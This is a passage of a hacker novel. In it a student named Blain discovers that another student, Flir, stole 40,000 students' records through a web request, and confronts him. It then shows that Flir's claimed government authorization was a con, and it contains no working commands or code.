“Whoa!” Blain said, shocked. “He popped the VATech cluster!” He knew all too well the power and prestige associated with Virginia Tech’s computing cluster. Blain’s heart sank. “Now Flir is off campus,” he thought, “and there’s no telling what he’s going to do now…”

Blain trailed off as another line in the file caught his attention. A curl command had been sent to the Pacific Tech web server. The command emulated a standard web browser request, with a unique session identifier. The identifier, 404280206xc492734fa653ee9077466754994704fL, was a very specific number, and had been entered for some purpose that eluded Blain. He copied the request, and fired it off to the Pacific Tech web server. The web server responded almost immediately by dumping a huge document into his web terminal. The data scrolled by so fast that Blain’s panicked Control-C didn’t even take place until the data was finished dumping into his terminal. Scrolling back, Blain looked in horror as he saw the personal information of over 40,000 Pacific Tech students, including Social Security Numbers. Flir stole the entire student body’s information right out from under his nose. Blain’s heart sank as he realized that he had been in the perfect position to stop this all along, and he had done nothing. Flir was gone. He was no longer online, and he had cleaned up his trail, as evidenced by his last commands. Cleaned up his trail completely and utterly. Blain saved the contents of the curl command to a file, and slammed his laptop closed. He was going after Flir before he did something with that data.

As he stepped out into the early evening air, he headed first for the ED04 building to check the computer lab. Reaching behind the desk, he rested his fingers on the laptop, relieved that it was still there. Next, he headed for Flir’s room, but he wasn’t around. Blain must have combed the entire campus, but there was no sign of Flir. “He’ll come to the lab,” Blain said, in a panic, “I know he will. And when he does, I’ll be there waiting for him.”

Blain ran back to the ED04 building. Though he thought about plopping down right in the lab, he thought better of it. He wanted to catch Flir in the act, pulling his laptop out from behind the desk. Instead, Blain went to his post across the hall. He pulled up a chair and got comfortable. He might be in for a long wait.

Hours later, Blain lurched out of his chair. He had fallen asleep. He looked at his watch, and panicked as he realized it was 7:00 AM! He had slept through the night! Blain ran across the hall, and reaching behind the desk, realized that he had blown it again. The Rogue was gone. He bolted across campus and headed straight for Flir’s room. As he ran down the steps, he stopped to check the floor before he ran across it. He had a new phobia about jumping off of steps. Within five paces, he was at Flir’s door. He pounded until Flir answered. Flir opened the door slowly; he had been sleeping.

“Wha…” Flir began.

“Who is it?” came a female voice from behind him.

“It’s the break dancing guy from the hallway,” Flir said with a grin.

“The name’s Blain. We need to talk.” Blain was ticked.

“Hrmm… Maybe later,” Flir offered.

“Now,” Blain growled, “or does the VATech cluster suddenly mean nothing to you?”

Flir’s eyes gave him away. “Let me pull on some clothes.” Flir reappeared within seconds and said, “Let’s go to the restaurant across campus, so we can see what you have to say.”

As they walked, Blain couldn’t contain himself. In hushed tones, he unraveled all he had seen, in sharp, accurate detail. Flir said nothing. As they slid into a booth at the restaurant, Blain reached the end of the tale, which culminated in the ominous curl command and the subsequent cleanup job.

“So, this ‘Rogue’ laptop,” Flir said.

“Your Rogue laptop,” Blain insisted.

“Mmmm… So it’s not there any more, and you don’t know where it is, do you?”

“Of course I know where it is, it’s in your room!” Blain was incensed.

“Yes, Blain, it’s in my room, and I’ll be honest with you, you shouldn’t have done what you did,” Flir said. Holding up a finger to quiet Blain, he continued. “Now look, you seem like a good kid, but I’ve got to be honest with you. This is a bad thing you’ve done, and I don’t think you have any grounds for pinning this on me.”

Blain sat stunned as Flir continued.

“You see, your prints are all over that machine. Inside, outside, everywhere. Your prints are on the tape and the desk. Everywhere. Just your prints, Blain. My prints aren’t on that gear. Am I being clear? Now the only problem is that you wiped all the data on each and every machine, so there’s little evidence of any of this, except on your controller laptop.”

“My controller laptop?!?!” Blain screeched, a sick knot growing in his stomach.

“Yes, Blain, your controller laptop. Now, I could call campus IT security and give them a tip on their intruder, and point them to your room and your laptop…” Flir took out his cell phone and opened it. He gave Blain a serious look.

“Wait,” Blain knew he was out of his league. “OK, what do you want?”

“I want you to forget this ever happened.” Flir felt a pang of guilt as he looked into this kid’s face. For an instant he saw himself, years ago. Bright eyed and eager, this kid was impressionable, and scared. Flir held the kid’s very future in the palm of his hand, but Flir wasn’t malicious, just brilliant. “Look, Blain, I’m not a jerk, and I’m not a criminal.” Blain sat in silence, watching Flir. Flir continued. “That exercise you witnessed was authorized.”

“Authorized, how could it possibly be…” Blain was beyond confused.

Flir cast an uncomfortable glance around the restaurant, then leaned in towards Blain. In a hushed tone, Flir said, “I was authorized by the government.”

“Mitch, you have got to be kidding me. After all the crap you’ve been through? How could you possibly trust the government?” Judging from the look on Flir’s face, the kid had a point. Blain continued, “How did the government approach you? Were you shown credentials? Did you call in and find out if those credentials were legitimate? Did you get a release form? Besides that, there’s no legitimate reason in the world why the government would authorize any citizen to do what you did. They could do it themselves. They probably were government, just not ours.”

It was Flir’s turn to be stunned, and the look on his face betrayed his feelings.

“What did you do with the data?” Blain asked. “You didn’t send it to anyone, did you?”

Flir’s face betrayed the answer again.

“Oh, man, Mitch,” Blain said, completely horrified. “What have you done? You’re the smartest guy I know, and I have a ton of respect for you, but….”

“But what?” Flir asked. The tables were turned, and Flir knew full well that he had been duped. Right at that moment it had all become perfectly clear. He knew he would have to get even with Knuth. It was a moral imperative.

“Mitch, you have got to be the most gullible genius on the planet.”
